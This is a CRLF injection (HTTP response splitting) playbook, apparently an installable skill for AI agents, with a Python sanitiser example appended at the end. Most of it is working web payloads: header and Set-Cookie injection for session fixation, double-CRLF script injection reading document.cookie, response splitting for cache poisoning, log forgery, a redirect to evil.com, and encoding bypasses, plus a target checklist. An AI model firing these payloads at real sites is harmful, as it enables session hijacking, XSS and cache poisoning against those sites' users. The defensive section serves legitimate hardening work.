CRLF injection playbook. Use when user input reaches HTTP response headers, Location redirects, Set-Cookie values, or log files where carriage-return/line-feed characters can split or inject content.
```shell
npx skill4agent add yaklang/hack-skills crlf-injection
```

AI LOAD INSTRUCTION: CRLF injection (HTTP response splitting) techniques. Covers header injection, response body injection via double CRLF, XSS escalation, cache poisoning, and encoding bypass. Often overlooked by scanners but chains into XSS, session fixation, and cache attacks.
CRLF = `\r\n` = `%0D%0A` (URL-encoded)

```
Normal:  Location: /page?url=USER_INPUT
Attack:  Location: /page?url=%0D%0ASet-Cookie:admin=true
Result:  Two headers: Location + injected Set-Cookie
```

Basic header injection payload:

```
%0D%0ANew-Header:injected
```
```
# In URL parameter:
https://target.com/redirect?url=%0D%0AX-Injected:true
# Check response headers for "X-Injected: true"
```

```
# Double CRLF ends the headers, so the remainder is rendered as the response body:
%0D%0A%0D%0A<script>alert(1)</script>
# Result:
HTTP/1.1 302 Found
Location: /page

<script>alert(1)</script>
```

Payloads for the other techniques covered by this playbook:

```
# Session fixation via injected Set-Cookie:
%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id
# Body injection (XSS) via double CRLF:
%0D%0A%0D%0A<html><script>alert(document.cookie)</script></html>
# Full response splitting (cache poisoning): Content-Length:0 ends the first response, a second complete response follows:
GET /page?q=%0D%0AContent-Length:0%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:text/html%0D%0A%0D%0A<script>alert(1)</script>
# Log injection: forged entry appended to the User-Agent value:
User-Agent: normal%0D%0A127.0.0.1 - admin [date] "GET /admin" 200
```

| Filter | Bypass |
|---|---|
| Blocks | Try |
| URL decodes once | Double-encode: |
| Strips | Use URL-encoded form |
| Blocks in value only | Inject in parameter name |
```
# Unicode/UTF-8 bypass:
%E5%98%8A%E5%98%8D → decoded as CRLF in some parsers
# Double URL encoding:
%250D%250A → server decodes to %0D%0A → interpreted as CRLF
# Partial injection (LF only):
%0A → some servers accept LF without CR
```

```
# Inject Set-Cookie via CRLF in redirect parameter:
?url=%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id
# Result:
HTTP/1.1 302 Found
Location: /page
Set-Cookie: PHPSESSID=attacker_controlled_session_id
# Victim uses attacker's session → attacker hijacks after login
```

```
# Two CRLF sequences end headers and inject response body:
?url=%0D%0A%0D%0A<script>alert(document.cookie)</script>
# Result:
HTTP/1.1 302 Found
Location: /page

<script>alert(document.cookie)</script>
```

```
# Inject new Location header before the original:
?url=%0D%0ALocation:http://evil.com%0D%0A%0D%0A
# Some servers use the LAST Location header → redirect to evil.com
```

Vulnerable code patterns:

```php
// PHP: header() with user input (PHP < 5.1.2 vulnerable):
header("Location: " . $_GET['url']);
```

```python
# Python: redirect with unsanitized input:
return redirect(request.args.get('next'))
```

```javascript
// Node.js: setHeader with user input:
res.setHeader('X-Custom', userInput);
```

```java
// Java: response.setHeader with user input:
response.setHeader("Location", request.getParameter("url"));
```

Checklist:

□ Inject %0D%0A in redirect URL parameters
□ Inject %0D%0A in Set-Cookie name/value paths
□ Try double CRLF for body injection → XSS
□ Test encoding bypasses: double-encode, Unicode (%E5%98%8D%E5%98%8A), LF-only (%0A)
□ Check if response is cacheable → cache poisoning
□ Test in User-Agent / Referer for log injection
□ Test CRLF + Set-Cookie for session fixation
□ Verify if Location header can be injected in 302 responses
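Added defensive example, not code from the yaklang/hack-skills playbook: framework-free Python checks that catch the redirect, encoding-bypass and log-injection payloads listed above before input reaches a header value or a log line. Modern runtimes already refuse raw CR/LF in header values (PHP since 5.1.2, Node's setHeader), but code that decodes input itself, builds redirect targets, or writes logs still needs a check of its own; the function names and the "/" fallback are this example's own choices.

```python
# Added defensive example (not from the yaklang/hack-skills playbook):
# reject CRLF in header values (raw, double-encoded, LF-only, Unicode
# look-alikes), constrain redirect targets, and escape CR/LF in log fields.
from urllib.parse import unquote

CR, LF = "\r", "\n"


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so %250D%250A is seen as CRLF."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_header_safe(value: str) -> bool:
    """True only if the value cannot terminate or split a header line.

    Both the raw and the decoded form are inspected. Code points whose low
    byte is 0x0A/0x0D are rejected as well, because some parsers truncate
    wide characters such as %E5%98%8A%E5%98%8D to LF/CR (the Unicode bypass).
    """
    for form in (value, fully_decode(value)):
        for ch in form:
            if ch in (CR, LF) or (ord(ch) & 0xFF) in (0x0A, 0x0D):
                return False
    return True


def safe_redirect_target(url: str, fallback: str = "/") -> str:
    """Return a Location value that cannot split the response: only a
    same-site relative path (no scheme, no //host) that passes the CRLF check."""
    if is_header_safe(url) and url.startswith("/") and not url.startswith("//"):
        return url
    return fallback


def sanitize_log_field(field: str) -> str:
    """Escape CR/LF so a forged entry (the User-Agent payload above) is
    written inside the real log line instead of starting a new one."""
    return field.replace(CR, "\\r").replace(LF, "\\n")
```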